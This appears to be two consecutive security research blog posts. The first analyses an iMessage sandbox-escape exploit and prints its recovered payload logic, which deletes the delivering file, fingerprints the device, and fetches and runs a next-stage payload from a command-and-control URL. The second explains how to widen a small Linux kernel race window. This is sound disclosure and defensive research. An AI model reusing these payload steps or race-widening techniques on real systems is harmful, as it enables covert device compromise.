     825    26400    32.0   JBIG2Bitmap  C++   CoreGraphics

heap was able to determine that the leaked memory contained JBIG2Bitmap objects.

Using the -address option we could find all the individual leaked bitmap objects:

$ heap -address JBIG2Bitmap $pid

and dump them out to files. One of those objects was quite unlike the others:

$ hexdump -C dumpXX.bin | head

00000000  62 70 6c 69 73 74 30 30  |bplist00|

...

00000018        24 76 65 72 73 69  |  $versi|

00000020  6f 6e 59 24 61 72 63 68  |onY$arch|

00000028  69 76 65 72 58 24 6f 62  |iverX$ob|

00000030  6a 65 63 74 73 54 24 74  |jectsT$t|

00000038  6f 70                    |op      |

00000040        4e 53 4b 65 79 65  |  NSKeye|

00000048  64 41 72 63 68 69 76 65  |dArchive|

It's clearly a serialized NSKeyedArchiver. Definitely not what you'd expect to see in a JBIG2Bitmap object. Running strings we see plenty of interesting things (noting that the URL below is redacted):

Objective-C class and selector names:

NSFunctionExpression

NSConstantValueExpression

NSConstantValue

expressionValueWithObject:context:

filteredArrayUsingPredicate:

_web_removeFileOnlyAtPath:

context:evaluateMobileSubscriberIdentity:

performSelectorOnMainThread:withObject:waitUntilDone:

...

The name of the file which delivered the exploit:

XXX.gif

Filesystems paths:

/tmp/com.apple.messages

/System/Library/PrivateFrameworks/SlideshowKit.framework/Frameworks/OpusFoundation.framework

a URL:

https://XXX.cloudfront.net/YYY/ZZZ/megalodon?AAA

Using plutil we can convert the bplist00 binary format to XML. Performing some post-processing and cleanup we can see that the top-level object in the NSKeyedArchiver is a serialized NSFunctionExpression object.
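For example (dumpXX.bin being one of the leaked-bitmap dumps from earlier):

$ plutil -convert xml1 -o dumpXX.xml dumpXX.bin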

NSExpressions and NSPredicates

If you've ever used Core Data or tried to filter a Objective-C collection you might have come across NSPredicates. According to Apple's public documentation they are used "to define logical conditions for constraining a search for a fetch or for in-memory filtering".

For example, in Objective-C you could filter an NSArray object like this:

  NSArray* names = @[@"one", @"two", @"three"];

  NSPredicate* pred;

  pred = [NSPredicate predicateWithFormat:

            @"SELF beginswith[c] 't'"];

  NSLog(@"%@", [names filteredArrayUsingPredicate:pred]);

The predicate is "SELF beginswith[c] 't'". This prints an NSArray containing only "two" and "three".

[NSPredicate predicateWithFormat] builds a predicate object by parsing a small query language, a little like an SQL query.

NSPredicates can be built up from NSExpressions, connected by NSComparisonPredicates (like less-than, greater-than and so on.)

NSExpressions themselves can be fairly complex, containing aggregate expressions (like "IN" and "CONTAINS"), subqueries, set expressions, and, most interestingly, function expressions.

Prior to 2007 (in OS X 10.4 and below) function expressions were limited to just the following five extra built-in methods: sum, count, min, max, and average.

But starting in OS X 10.5 (which would also be around the launch of iOS in 2007) NSFunctionExpressions were extended to allow arbitrary method invocations with the FUNCTION keyword:

  "FUNCTION('abc', 'stringByAppendingString', 'def')" => @"abcdef"

FUNCTION takes a target object, a selector and an optional list of arguments then invokes the selector on the object, passing the arguments. In this case it will allocate an NSString object @"abc" then invoke the stringByAppendingString: selector passing the NSString @"def", which will evaluate to the NSString @"abcdef".

In addition to the FUNCTION keyword there's CAST which allows full reflection-based access to all Objective-C types (as opposed to just being able to invoke selectors on literal strings and integers):

  "FUNCTION(CAST('NSFileManager', 'Class'), 'defaultManager')"

Here we can get access to the NSFileManager class and call the defaultManager selector to get a reference to a process's shared file manager instance.

These keywords exist in the string representation of NSPredicates and NSExpressions. Parsing those strings involves creating a graph of NSExpression objects, NSPredicate objects and their subclasses like NSFunctionExpression. It's a serialized version of such a graph which is present in the JBIG2 bitmap.

NSPredicates using the FUNCTION keyword are effectively Objective-C scripts. With some tricks it's possible to build nested function calls which can do almost anything you could do in procedural Objective-C. Figuring out some of those tricks was the key to the 2019 Real World CTF DezhouInstrumentz challenge, which would evaluate an attacker supplied NSExpression format string. The writeup by the challenge author is a great introduction to these ideas and I'd strongly recommend reading that now if you haven't. The rest of this post builds on the tricks described in that post.

A tale of two parts

The only job of the JBIG2 logic gate machine described in the previous blog post is to cause the deserialization and evaluation of an embedded NSFunctionExpression. No attempt is made to get native code execution, ROP, JOP or any similar technique.

Prior to iOS 14.5 the isa field of an Objective-C object was not protected by Pointer Authentication Codes (PAC), so the JBIG2 machine builds a fake Objective-C object with a fake isa such that the invocation of the dealloc selector causes the deserialization and evaluation of the NSFunctionExpression. This is very similar to the technique used by Samuel in the 2020 SLOP post.

This NSFunctionExpression has two purposes:

Firstly, it allocates and leaks an AMSKeepAlive object then tries to cover its tracks by finding and deleting the .gif file which delivered the exploit.

Secondly, it builds a payload NSPredicate object then triggers a logic bug to get that NSPredicate object evaluated in the CommCenter process, reachable from the IMTranscoderAgent sandbox via the com.apple.commcenter.xpc NSXPC service.

Let's look at those two parts separately:

Covering tracks

The outer level NSFunctionExpression calls performSelectorOnMainThread:withObject:waitUntilDone:, which in turn calls makeObjectsPerformSelector: (with the selector expressionValueWithObject:context:) on an NSArray of four NSFunctionExpressions. This allows the four independent NSFunctionExpressions to be evaluated sequentially.

With some manual cleanup we can recover pseudo-Objective-C versions of the serialized NSFunctionExpressions.

The first one does this:

[[AMSKeepAlive alloc] initWithName:"KA"]

This allocates and then leaks an AppleMediaServices KeepAlive object. The exact purpose of this is unclear.

The second entry does this:

[[NSFileManager defaultManager] _web_removeFileOnlyAtPath:

  [@"/tmp/com.apple.messages" stringByAppendingPathComponent:

    [ [ [ [

            [NSFileManager defaultManager]

            enumeratorAtPath: @"/tmp/com.apple.messages"

          ]

          allObjects

        ]

        filteredArrayUsingPredicate:

          [

            [NSPredicate predicateWithFormat:

              [

                [@"SELF ENDSWITH '"

                  stringByAppendingString: "XXX.gif"]

                stringByAppendingString: "'"

      ]   ] ] ]

      firstObject

    ]

  ]

]

Reading these single expression NSFunctionExpressions is a little tricky; breaking that down into a more procedural form it's equivalent to this:

NSFileManager* fm = [NSFileManager defaultManager];

NSDirectoryEnumerator* dir_enum;

dir_enum = [fm enumeratorAtPath: @"/tmp/com.apple.messages"];

NSArray* allTmpFiles = [dir_enum allObjects];

NSString* filter;

filter = [@"SELF ENDSWITH '" stringByAppendingString: @"XXX.gif"];

filter = [filter stringByAppendingString: "'"];

NSPredicate* pred;

pred = [NSPredicate predicateWithFormat: filter];

NSArray* matches;

matches = [allTmpFiles filteredArrayUsingPredicate: pred];

NSString* gif_subpath = [matches firstObject];

NSString* root = @"/tmp/com.apple.messages";

NSString* full_path;

full_path = [root stringByAppendingPathComponent: gif_subpath];

[fm _web_removeFileOnlyAtPath: full_path];

This finds the XXX.gif file used to deliver the exploit, which iMessage has stored somewhere under the /tmp/com.apple.messages folder, and deletes it.

The other two NSFunctionExpressions build a payload and then trigger its evaluation in CommCenter. For that we need to look at NSXPC.

NSXPC

NSXPC is a semi-transparent remote-procedure-call mechanism for Objective-C. It allows the instantiation of proxy objects in one process which transparently forward method calls to the "real" object in another process:

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html

I say NSXPC is only semi-transparent because it does enforce some restrictions on what objects are allowed to traverse process boundaries. Any object "exported" via NSXPC must also define a protocol which designates which methods can be invoked and the allowable types for each argument. The NSXPC programming guide further explains the extra handling required for methods which require collections and other edge cases.

The low-level serialization used by NSXPC is the same as that explored by Natalie Silvanovich in her 2019 blog post looking at the fully-remote attack surface of the iPhone. An important observation in that post was that subclasses of classes with any level of inheritance are also allowed, as is always the case with NSKeyedUnarchiver deserialization.

This means that any protocol object which declares a particular type for a field will also, by design, accept any subclass of that type.

The logical extreme of this would be that a protocol which declared an argument type of NSObject would allow any subclass of NSObject, which covers the vast majority of all Objective-C classes.

Grep to the rescue

This is fairly easy to analyze automatically. Protocols are defined statically so we can just find them and check each one. Tools like RuntimeBrowser and classdump can parse the static protocol definitions and output human-readable source code. Grepping the output of RuntimeBrowser like this is sufficient to find dozens of cases of NSObject pointers in Objective-C protocols:

  $ egrep -Rn "\(NSObject \*\)arg" *

Not all the results are necessarily exposed via NSXPC, but some clearly are, including the following two matches in CoreTelephony.framework:

Frameworks/CoreTelephony.framework/\

CTXPCServiceSubscriberInterface-Protocol.h:39:

-(void)evaluateMobileSubscriberIdentity:

        (CTXPCServiceSubscriptionContext *)arg1

       identity:(NSObject *)arg2

       completion:(void (^)(NSError *))arg3;

Frameworks/CoreTelephony.framework/\

CTXPCServiceCarrierBundleInterface-Protocol.h:13:

-(void)setWiFiCallingSettingPreferences:

         (CTXPCServiceSubscriptionContext *)arg1

       key:(NSString *)arg2

       value:(NSObject *)arg3

       completion:(void (^)(NSError *))arg4;

The evaluateMobileSubscriberIdentity string appears in the list of selector-like strings we first saw when running strings on the bplist00. Indeed, looking at the parsed and beautified NSFunctionExpression we see it doing this:

[ [ [CoreTelephonyClient alloc] init]

  context:X

  evaluateMobileSubscriberIdentity:Y]

This is a wrapper around the lower-level NSXPC code and the argument passed as Y above to the CoreTelephonyClient method corresponds to the identity:(NSObject *)arg2 argument passed via NSXPC to CommCenter (which is the process that hosts com.apple.commcenter.xpc, the NSXPC service underlying the CoreTelephonyClient). Since the parameter is explicitly typed as NSObject* we can in fact pass any subclass of NSObject, including an NSPredicate! Game over?

Parsing vs Evaluation

It's not quite that easy. The DezhouInstrumentz writeup discusses this attack surface and notes that there's an extra, specific mitigation. When an NSPredicate is deserialized by its initWithCoder: implementation it sets a flag which disables evaluation of the predicate until the allowEvaluation method is called.

So whilst you certainly can pass an NSPredicate* as the identity argument across NSXPC and get it deserialized in CommCenter, the implementation of evaluateMobileSubscriberIdentity: in CommCenter is definitely not going to call allowEvaluation to mark the predicate as safe for evaluation and then evaluateWithObject: to evaluate it.

Old techniques, new tricks

From the exploit we can see that they in fact pass an NSArray with two elements:

[0] = AVSpeechSynthesisVoice

[1] = PTSection { rows = NSArray { [0] = PTRow() } }

The first element is an AVSpeechSynthesisVoice object and the second is a PTSection containing a single PTRow. Why?

PTSection and PTRow are both defined in the PrototypeTools private framework. PrototypeTools isn't loaded in the CommCenter target process. Let's look at what happens when an AVSpeechSynthesisVoice is deserialized:

Finding a voice

AVSpeechSynthesisVoice is implemented in AVFAudio.framework, which is loaded in CommCenter:

$ sudo vmmap `pgrep CommCenter` | grep AVFAudio

__TEXT  7ffa22c4c000-7ffa22d44000 r-x/r-x SM=COW \

/System/Library/Frameworks/AVFAudio.framework/Versions/A/AVFAudio

Assuming that this was the first time that an AVSpeechSynthesisVoice object was created inside CommCenter (which is quite likely) the Objective-C runtime will call the initialize method on the AVSpeechSynthesisVoice class before instantiating the first instance.

[AVSpeechSynthesisVoice initialize] has a dispatch_once block with the following code:

NSBundle* bundle;

bundle = [NSBundle bundleWithPath:

                     @"/System/Library/AccessibilityBundles/\

                         AXSpeechImplementation.bundle"];

if (![bundle isLoaded]) {

    NSError* err;

    [bundle loadAndReturnError:&err];

}

So sending a serialized AVSpeechSynthesisVoice object will cause CommCenter to load the /System/Library/AccessibilityBundles/AXSpeechImplementation.bundle library. With some scripting using otool -L to list dependencies we can find the following dependency chain from AXSpeechImplementation.bundle to PrototypeTools.framework:

['/System/Library/AccessibilityBundles/\

    AXSpeechImplementation.bundle/AXSpeechImplementation',

 '/System/Library/PrivateFrameworks/\

    AccessibilityUtilities.framework/AccessibilityUtilities',

 '/System/Library/PrivateFrameworks/\

    AccessibilitySharedSupport.framework/AccessibilitySharedSupport',

'/System/Library/PrivateFrameworks/Sharing.framework/Sharing',

'/System/Library/PrivateFrameworks/\

    PrototypeTools.framework/PrototypeTools']

This explains how the deserialization of a PTSection will succeed. But what's so special about PTSections and PTRows?

Predicated Sections

[PTRow initWithCoder:] contains the following snippet:

  self->condition = [coder decodeObjectOfClass:NSPredicate

                           forKey:@"condition"]

  [self->condition allowEvaluation]

This will deserialize an NSPredicate object, assign it to the PTRow member variable condition and call allowEvaluation. This is meant to indicate that the deserializing code considers this predicate safe, but there's no attempt to perform any validation on the predicate contents here. They then need one more trick: finding a code path which will actually evaluate the PTRow's condition predicate.

Here's a snippet from [PTSection initWithCoder:]:

NSSet* allowed = [NSSet setWithObjects: @[PTRow]]

id* rows = [coder decodeObjectOfClasses:allowed forKey:@"rows"]

[self initWithRows:rows]

This deserializes an array of PTRows and passes them to [PTSection initWithRows] which assigns a copy of the array of PTRows to PTSection->rows then calls [self _reloadEnabledRows] which in turn passes each row to [self _shouldEnableRow:]

_shouldEnableRow:row {

  if (row->condition) {

    return [row->condition evaluateWithObject: self->settings]

  }

}

And thus, by sending a PTSection containing a single PTRow with an attached condition NSPredicate, they can cause the evaluation of an arbitrary NSPredicate, effectively equivalent to arbitrary code execution in the context of CommCenter.

Payload 2

The NSPredicate attached to the PTRow uses a similar trick to the first payload to cause the evaluation of six independent NSFunctionExpressions, but this time in the context of the CommCenter process. They're presented here in pseudo Objective-C:

Expression 1

[  [CaliCalendarAnonymizer sharedAnonymizedStrings]

   setObject:

     @[[NSURLComponents

         componentsWithString:

         @"https://cloudfront.net/XXX/XXX/XXX?aaaa"], '0']

   forKey: @"0"

]

The use of [CaliCalendarAnonymizer sharedAnonymizedStrings] is a trick to enable the array of independent NSFunctionExpressions to have "local variables". In this first case they create an NSURLComponents object which is used to build parameterised URLs. This URL builder is then stored in the global dictionary returned by [CaliCalendarAnonymizer sharedAnonymizedStrings] under the key "0".

Expression 2

[[NSBundle

  bundleWithPath:@"/System/Library/PrivateFrameworks/\

     SlideshowKit.framework/Frameworks/OpusFoundation.framework"

 ] load]

This causes the OpusFoundation library to be loaded. The exact reason for this is unclear, though the dependency graph of OpusFoundation does include AuthKit which is used by the next NSFunctionExpression. It's possible that this payload is generic and might also be expected to work when evaluated in processes where AuthKit isn't loaded.

Expression 3

[ [ [CaliCalendarAnonymizer sharedAnonymizedStrings]

    objectForKey:@"0" ]

  setQueryItems:

    [ [ [NSArray arrayWithObject:

                 [NSURLQueryItem

                    queryItemWithName: @"m"

                    value:[AKDevice _hardwareModel] ]

                                 ] arrayByAddingObject:

                 [NSURLQueryItem

                    queryItemWithName: @"v"

                    value:[AKDevice _buildNumber] ]

                                 ] arrayByAddingObject:

                 [NSURLQueryItem

                    queryItemWithName: @"u"

                    value:[NSString randomString]]

]

This grabs a reference to the NSURLComponents object stored under the "0" key in the global sharedAnonymizedStrings dictionary then parameterizes the HTTP query string with three values:

  [AKDevice _hardwareModel] returns a string like "iPhone12,3" which determines the exact device model.

  [AKDevice _buildNumber] returns a string like "18A8395" which in combination with the device model allows determining the exact firmware image running on the device.

  [NSString randomString] returns a decimal string representation of a 32-bit random integer like "394681493".

Expression 4

[ [CaliCalendarAnonymizer sharedAnonymizedStrings]

  setObject:

    [NSPropertyListSerialization

      propertyListWithData:

        [[[NSData

             dataWithContentsOfURL:

               [[[CaliCalendarAnonymizer sharedAnonymizedStrings]

                 objectForKey:@"0"] URL]

          ] AES128DecryptWithPassword:NSData(XXXX)

         ]  decompressedDataUsingAlgorithm:3 error:]

       options: Class(NSConstantValueExpression)

      format: Class(NSConstantValueExpression)

      errors:Class(NSConstantValueExpression)

  ]

  forKey:@"1"

]

The innermost reference to sharedAnonymizedStrings here grabs the NSURLComponents object and builds the full URL from the query string parameters set earlier. That URL is passed to [NSData dataWithContentsOfURL:] to fetch a data blob from a remote server.

That data blob is decrypted with a hardcoded AES128 key, decompressed using zlib then parsed as a plist. That parsed plist is stored in the sharedAnonymizedStrings dictionary under the key "1".

Expression 5

[ [[NSThread mainThread] threadDictionary]

  addEntriesFromDictionary:

    [[CaliCalendarAnonymizer sharedAnonymizedStrings]

    objectForKey:@"1"]

]

This copies all the keys and values from the "next-stage" plist into the main thread's threadDictionary.

Expression 6

[ [NSExpression expressionWithFormat:

    [[[CaliCalendarAnonymizer sharedAnonymizedStrings]

      objectForKey:@"1"]

    objectForKey: @"a"]

  ]

  expressionValueWithObject:nil context:nil

]

Finally, this fetches the value of the "a" key from the next-stage plist, parses it as an NSExpression string and evaluates it.

End of the line

At this point we lose the ability to follow the exploit. The attackers have escaped the IMTranscoderAgent sandbox, requested a next-stage from the command and control server and executed it, all without any memory corruption or dependencies on particular versions of the operating system.

In response to this exploit iOS 15.1 significantly reduced the computational power available to NSExpressions:

NSExpression immediately forbids certain operations that have significant side effects, like creating and destroying objects. Additionally, casting string class names into Class objects with NSConstantValueExpression is deprecated.

In addition the PTSection and PTRow objects have been hardened with the following check added around the parsing of serialized NSPredicates:

if (os_variant_allows_internal_security_policies(

      "com.apple.PrototypeTools")) {

  [coder decodeObjectOfClass:NSPredicate forKey:@"condition"];

...

Object deserialization across trust boundaries still presents an enormous attack surface, however.

Conclusion

Perhaps the most striking takeaway is the depth of the attack surface reachable from what would hopefully be a fairly constrained sandbox. With just two tricks (NSObject pointers in protocols and library loading gadgets) it's likely possible to attack almost every initWithCoder implementation in the dyld_shared_cache. There are presumably many other classes in addition to NSPredicate and NSExpression which provide the building blocks for logic-style exploits.

The expressive power of NSXPC just seems fundamentally ill-suited for use across sandbox boundaries, even though it was designed with exactly that in mind. The attack surface reachable from inside a sandbox should be minimal, enumerable and reviewable. Ideally only code which is required for correct functionality should be reachable; it should be possible to determine exactly what that exposed code is and the amount of exposed code should be small enough that manually reviewing it is tractable.

NSXPC requiring developers to explicitly add remotely-exposed methods to interface protocols is a great example of how to make the attack surface enumerable - you can at least find all the entry points fairly easily. However the support for inheritance means that the attack surface exposed there likely isn't reviewable; it's simply too large for anything beyond a basic example.

Refactoring these critical IPC boundaries to be more prescriptive - only allowing a much narrower set of objects in this case - would be a good step towards making the attack surface reviewable. This would probably require fairly significant refactoring for NSXPC; it's built around natively supporting the Objective-C inheritance model and is used very broadly. But without such changes the exposed attack surface is just too large to audit effectively.

The advent of Memory Tagging Extensions (MTE), likely shipping in multiple consumer devices across the ARM ecosystem this year, is a big step in the defense against memory corruption exploitation. But attackers innovate too, and are likely already two steps ahead with a renewed focus on logic bugs. This sandbox escape exploit is likely a sign of the shift we can expect to see over the next few years if the promises of MTE can be delivered. And this exploit was far more extensible, reliable and generic than almost any memory corruption exploit could ever hope to be.

Racing against the clock -- hitting a tiny kernel race window

By: Ryan
24 March 2022 at 20:51

TL;DR:

How to make a tiny kernel race window really large even on kernels without CONFIG_PREEMPT:

  • use a cache miss to widen the race window a little bit
  • make a timerfd expire in that window (which will run in an interrupt handler - in other words, in hardirq context)
  • make sure that the wakeup triggered by the timerfd has to churn through 50000 waitqueue items created by epoll

Racing one thread against a timer also avoids accumulating timing variations from two threads in each race attempt - hence the title. On the other hand, it also means you now have to deal with how hardware timers actually work, which introduces its own flavors of weird timing variations.

Introduction

I recently discovered a race condition (https://crbug.com/project-zero/2247) in the Linux kernel. (While trying to explain to someone how the fix for CVE-2021-0920 worked - I was explaining why the Unix GC is now safe, and then got confused because I couldn't actually figure out why it's safe after that fix, eventually realizing that it actually isn't safe.) It's a fairly narrow race window, so I was wondering whether it could be hit with a small number of attempts - especially on kernels that aren't built with CONFIG_PREEMPT, which would make it possible to preempt a thread with another thread, as I described at LSSEU2019.

This is a writeup of how I managed to hit the race on a normal Linux desktop kernel, with a hit rate somewhere around 30% if the proof of concept has been tuned for the specific machine. I didn't do a full exploit though; I stopped at getting evidence of use-after-free (UAF) accesses (with the help of a very large file descriptor table and userfaultfd, which might not be available to normal users depending on system configuration), because that's the part I was curious about.

This also demonstrates that even very small race conditions can still be exploitable if someone sinks enough time into writing an exploit, so be careful if you dismiss very small race windows as unexploitable or don't treat such issues as security bugs.

The UAF reproducer is in our bugtracker.

The bug

In the UNIX domain socket garbage collection code (which is needed to deal with reference loops formed by UNIX domain sockets that use SCM_RIGHTS file descriptor passing), the kernel tries to figure out whether it can account for all references to some file by comparing the file's refcount with the number of references from inflight SKBs (socket buffers). If they are equal, it assumes that the UNIX domain sockets subsystem effectively has exclusive access to the file because it owns all references.

(The same pattern also appears for files as an optimization in __fdget_pos(), see this LKML thread.)

The problem is that struct file can also be referenced from an RCU read-side critical section (which you can't detect by looking at the refcount), and such an RCU reference can be upgraded into a refcounted reference using get_file_rcu() / get_file_rcu_many() by __fget_files() as long as the refcount is non-zero. For example, when this happens in the dup() syscall, the resulting reference will then be installed in the FD table and be available for subsequent syscalls.

When the garbage collector (GC) believes that it has exclusive access to a file, it will perform operations on that file that violate the locking rules used in normal socket-related syscalls such as recvmsg() - unix_stream_read_generic() assumes that queued SKBs can only be removed under the ->iolock mutex, but the GC removes queued SKBs without using that mutex. (Thanks to Xingyu Jin for explaining that to me.)

One way of looking at this bug is that the GC is working correctly - here's a state diagram showing some of the possible states of a struct file, with more specific states nested under less specific ones and with the state transition in the GC marked:

All relevant states are RCU-accessible. An RCU-accessible object can have either a zero refcount or a positive refcount. Objects with a positive refcount can be either live or owned by the garbage collector. When the GC attempts to grab a file, it transitions from the state "live" to the state "owned by GC" by getting exclusive ownership of all references to the file.

__fget_files(), on the other hand, makes an incorrect assumption about the state of the struct file while it tries to narrow down its possible states - it checks whether get_file_rcu() / get_file_rcu_many() succeeds, which narrows the file's state down a bit but not far enough:

__fget_files() first uses get_file_rcu() to conditionally narrow the state of a file from "any RCU-accessible state" to "any refcounted state". Then it has to narrow the state from "any refcounted state" to "live", but instead it just assumes that they are equivalent.

And this directly leads to how the bug was fixed (there's another follow-up patch, but that one just tries to clarify the code and recoup some of the resulting performance loss) - the fix adds another check in __fget_files() to properly narrow down the state of the file such that the file is guaranteed to be live:

The fix is to properly narrow the state from "any refcounted state" to "live" by checking whether the file is still referenced by a file descriptor table entry.

The fix ensures that a live reference can only be derived from another live reference by comparing with an FD table entry, which is guaranteed to point to a live object.

[Sidenote: This scheme is similar to the one used for struct page - gup_pte_range() also uses the "grab pointer, increment refcount, recheck pointer" pattern for locklessly looking up a struct page from a page table entry while ensuring that new refcounted references can't be created without holding an existing reference. This is really important for struct page because a page can be given back to the page allocator and reused while gup_pte_range() holds an uncounted reference to it - freed pages still have their struct page, so there's no need to delay freeing of the page - so if this went wrong, you'd get a page UAF.]

My initial suggestion was to instead fix the issue by changing how unix_gc() ensures that it has exclusive access, letting it set the file's refcount to zero to prevent turning RCU references into refcounted ones; this would have avoided adding any code in the hot __fget_files() path, but it would have only fixed unix_gc(), not the __fdget_pos() case I discovered later, so it's probably a good thing this isn't how it was fixed:

[Sidenote: In my original bug report I wrote that you'd have to wait an RCU grace period in the GC for this, but that wouldn't be necessary as long as the GC ensures that a reaped socket's refcount never becomes non-zero again.]

The race

There are multiple race conditions involved in exploiting this bug, but by far the trickiest to hit is that we have to race an operation into the tiny race window in the middle of __fget_files() (which can e.g. be reached via dup()), between the file descriptor table lookup and the refcount increment:

static struct file *__fget_files(struct files_struct *files, unsigned int fd,

                                 fmode_t mask, unsigned int refs)

{

        struct file *file;

        rcu_read_lock();

loop:

        file = files_lookup_fd_rcu(files, fd); // race window start

        if (file) {

                /* File object ref couldn't be taken.

                 * dup2() atomicity guarantee is the reason

                 * we loop to catch the new file (or NULL pointer)

                 */

                if (file->f_mode & mask)

                        file = NULL;

                else if (!get_file_rcu_many(file, refs)) // race window end

                        goto loop;

        }

        rcu_read_unlock();

        return file;

}

In this race window, the file descriptor must be closed (to drop the FD's reference to the file) and a unix_gc() run must get past the point where it checks the file's refcount ("total_refs = file_count(u->sk.sk_socket->file)").

In the Debian 5.10.0-9-amd64 kernel at version 5.10.70-1, that race window looks as follows:

<__fget_files+0x1e> cmp    r10,rax

<__fget_files+0x21> sbb    rax,rax

<__fget_files+0x24> mov    rdx,QWORD PTR [r11+0x8]

<__fget_files+0x28> and    eax,r8d

<__fget_files+0x2b> lea    rax,[rdx+rax*8]

<__fget_files+0x2f> mov    r12,QWORD PTR [rax] ; RACE WINDOW START

; r12 now contains file*

<__fget_files+0x32> test   r12,r12

<__fget_files+0x35> je     ffffffff812e3df7 <__fget_files+0x77>

<__fget_files+0x37> mov    eax,r9d

<__fget_files+0x3a> and    eax,DWORD PTR [r12+0x44] ; LOAD (for ->f_mode)

<__fget_files+0x3f> jne    ffffffff812e3df7 <__fget_files+0x77>

<__fget_files+0x41> mov    rax,QWORD PTR [r12+0x38] ; LOAD (for ->f_count)

<__fget_files+0x46> lea    rdx,[r12+0x38]

<__fget_files+0x4b> test   rax,rax

<__fget_files+0x4e> je     ffffffff812e3def <__fget_files+0x6f>

<__fget_files+0x50> lea    rcx,[rsi+rax*1]

<__fget_files+0x54> lock cmpxchg QWORD PTR [rdx],rcx ; RACE WINDOW END (on cmpxchg success)

As you can see, the race window is fairly small - around 12 instructions, assuming that the cmpxchg succeeds.

Missing some cache

Luckily for us, the race window contains the first few memory accesses to the struct file; therefore, by making sure that the struct file is not present in the fastest CPU caches, we can widen the race window by as much time as the memory accesses take. The standard way to do this is to use an eviction pattern / eviction set; but instead we can also make the cache line dirty on another core (see Anders Fogh's blogpost for more detail). (I'm not actually sure about the intricacies of how much latency this adds on different manufacturers' CPU cores, or on different CPU generations - I've only tested different versions of my proof-of-concept on Intel Skylake and Tiger Lake. Differences in cache coherency protocols or snooping might make a big difference.)

For the cache line containing the flags and refcount of a struct file, this can be done by, on another CPU, temporarily bumping its refcount up and then changing it back down, e.g. with close(dup(fd)) (or just by accessing the FD in pretty much any way from a multithreaded process).

However, when we're trying to hit the race in __fget_files() via dup(), we don't want any cache misses to occur before we hit the race window - that would slow us down and probably make us miss the race. To prevent that from happening, we can call dup() with a different FD number for a warm-up run shortly before attempting the race. Because we also want the relevant cache line in the FD table to be hot, we should choose the FD number for the warm-up run such that it falls into the same cache line of the FD table as the victim FD.
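A minimal sketch of this cache-bouncing step, mirroring the PoC diff shown further down (the CPU numbers are placeholders; error handling omitted):

#define _GNU_SOURCE
#include <sched.h>
#include <unistd.h>

static void pin_to(int cpu) {
  cpu_set_t set;
  CPU_ZERO(&set);
  CPU_SET(cpu, &set);
  sched_setaffinity(0, sizeof(set), &set);
}

static void bounce_file_cacheline(int victim_fd) {
  pin_to(2);              // hop to another core...
  close(dup(victim_fd));  // ...bump and drop f_count, dirtying its cache line there
  pin_to(1);              // back on the racing core, which now misses on that line
}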

An interruption

Okay, a cache miss might be something like a few dozen or maybe a hundred nanoseconds - that's better, but it's not great. What else can we do to make this tiny piece of code much slower to execute?

On Android, kernels normally set CONFIG_PREEMPT, which would've allowed abusing the scheduler to somehow interrupt the execution of this code. The way I've done this in the past was to give the victim thread a low scheduler priority and pin it to a specific CPU core together with another high-priority thread that is blocked on a read() syscall on an empty pipe (or eventfd); when data is written to the pipe from another CPU core, the pipe becomes readable, so the high-priority thread (which is registered on the pipe's waitqueue) becomes schedulable, and an inter-processor interrupt (IPI) is sent to the victim's CPU core to force it to enter the scheduler immediately.
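A rough sketch of that setup, assuming CONFIG_PREEMPT and enough privilege for SCHED_FIFO (e.g. CAP_SYS_NICE); the priority value is a placeholder, and the thread pinning is only described in comments:

#define _GNU_SOURCE
#include <pthread.h>
#include <sched.h>
#include <unistd.h>

static int wake_pipe[2];  // created with pipe(wake_pipe) during setup

static void *high_prio_waiter(void *arg) {
  // give this thread high real-time priority; it must also be pinned to the
  // same CPU core as the low-priority victim thread
  struct sched_param sp = { .sched_priority = 50 };
  pthread_setschedparam(pthread_self(), SCHED_FIFO, &sp);
  char c;
  read(wake_pipe[0], &c, 1);  // blocks, registered on the empty pipe's waitqueue
  return NULL;
}

// From another CPU core, at the moment the victim should be preempted:
//   write(wake_pipe[1], "x", 1);  // pipe readable -> waiter schedulable -> IPI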

One problem with that approach, aside from its reliance on CONFIG_PREEMPT, is that any timing variability in the kernel code involved in sending the IPI makes it harder to actually preempt the victim thread in the right spot.

(Thanks to the Xen security team - I think the first time I heard the idea of using an interrupt to widen a race window might have been from them.)

Setting an alarm

A better way to do this on an Android phone would be to trigger the scheduler not from an IPI, but from an expiring high-resolution timer on the same core, although I didn't get it to work (probably because my code was broken in unrelated ways).

High-resolution timers (hrtimers) are exposed through many userspace APIs. Even the timeout of select()/pselect() uses an hrtimer, although this is an hrtimer that normally has some slack applied to it to allow batching it with timers that are scheduled to expire a bit later. An example of a non-hrtimer-based API is the timeout used for reading from a UNIX domain socket (and probably also other types of sockets?), which can be set via SO_RCVTIMEO.

The thing that makes hrtimers "high-resolution" is that they don't just wait for the next periodic clock tick to arrive; instead, the expiration time of the next hrtimer on the CPU core is programmed into a hardware timer. So we could set an absolute hrtimer for some time in the future via something like timer_settime() or timerfd_settime(), and then at exactly the programmed time, the hardware will raise an interrupt! We've made the timing behavior of the OS irrelevant for the second side of the race, the only thing that matters is the hardware! Or... well, almost...
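Concretely, arming such an absolute timer from userspace can look like this minimal sketch (the clock choice and the 500us offset are arbitrary; error handling omitted):

#include <sys/timerfd.h>
#include <time.h>

static int arm_absolute_timer(void) {
  int tfd = timerfd_create(CLOCK_MONOTONIC, 0);
  struct itimerspec its = {0};            // zero it_interval: one-shot timer
  clock_gettime(CLOCK_MONOTONIC, &its.it_value);
  its.it_value.tv_nsec += 500 * 1000;     // absolute deadline 500us from now
  if (its.it_value.tv_nsec >= 1000000000L) {  // normalize the timespec
    its.it_value.tv_sec += 1;
    its.it_value.tv_nsec -= 1000000000L;
  }
  timerfd_settime(tfd, TFD_TIMER_ABSTIME, &its, NULL);
  return tfd;  // read()/epoll on this FD block until the deadline
}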

[Sidenote] Absolute timers: Not quite absolute

So we pick some absolute time at which we want to be interrupted, and tell the kernel using a syscall that accepts an absolute time, in nanoseconds. And then when that timer is the next one scheduled, the OS converts the absolute time to whatever clock base/scale the hardware timer is based on, and programs it into hardware. And the hardware usually supports programming timers with absolute time - e.g. on modern X86 (with X86_FEATURE_TSC_DEADLINE_TIMER), you can simply write an absolute Time Stamp Counter(TSC) deadline into MSR_IA32_TSC_DEADLINE, and when that deadline is reached, you get an interrupt. The situation on arm64 is similar, using the timer's comparator register (CVAL).

